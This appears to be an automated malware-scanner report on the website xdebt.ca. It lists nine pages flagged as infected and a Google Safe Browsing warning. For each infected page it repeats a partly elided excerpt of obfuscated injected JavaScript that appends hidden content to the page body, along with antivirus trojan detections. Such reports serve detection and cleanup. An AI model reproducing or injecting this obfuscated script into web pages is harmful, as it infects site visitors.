Malware Scanner report for xdebt.ca

Malicious/Suspicious/Total urls checked: 9/0/11

9 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "xdebt.ca" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xdebt.ca

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://xdebt.ca/	200 OK Content-Length: 111872 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/index.php	200 OK Content-Length: 111872 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/your_debt_options.php	200 OK Content-Length: 122661 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/ /about_us.php	404 Not Found Content-Length: 52 Content-Type: text/html	clean
http://xdebt.ca/test404page.js	404 Not Found Content-Length: 52 Content-Type: text/html	clean
http://xdebt.ca/faq.php	200 OK Content-Length: 120131 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/testimonials.php	200 OK Content-Length: 106345 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/contactus.php	200 OK Content-Length: 108799 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/login.php	200 OK Content-Length: 106339 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/disclaimer.php	200 OK Content-Length: 106329 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI
http://xdebt.ca/privacy.php	200 OK Content-Length: 106333 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va ... 2128 bytes are skipped ...unction fjTef(){if('XzdK'=='wXfu')RwtnyB();var THfpf;if(document[UWBBomP]){if('jLLjG'=='pNrTxH')IXRVx='qxRPf';var document_body_var=document[UWBBomP];var hFTxMY='lMApyM';document_body_var[kCkOAJ].apply(document_body_var,[nFfOZwAbt]);var ldFFAX='jlGwE';}else{var SVle;setTimeout(fjTef,120);var hNrAj;} function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports: nProtect Trojan.JS.Agent.HBI TrendMicro-HouseCall TROJ_GEN.F47V0120 Emsisoft Trojan.JS.Agent.HBI (B) TrendMicro HEUR_HTJS.HDJSFN Kaspersky HEUR:Trojan.Script.Generic F-Secure Trojan.JS.Agent.HBI GData Trojan.JS.Agent.HBI BitDefender Trojan.JS.Agent.HBI

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xdebt.ca

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 07:42:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html

Second query (visit from search engine):
GET / HTTP/1.1
Host: xdebt.ca
Referer: http://www.google.com/search?q=xdebt.ca

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for xdebt.ca

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools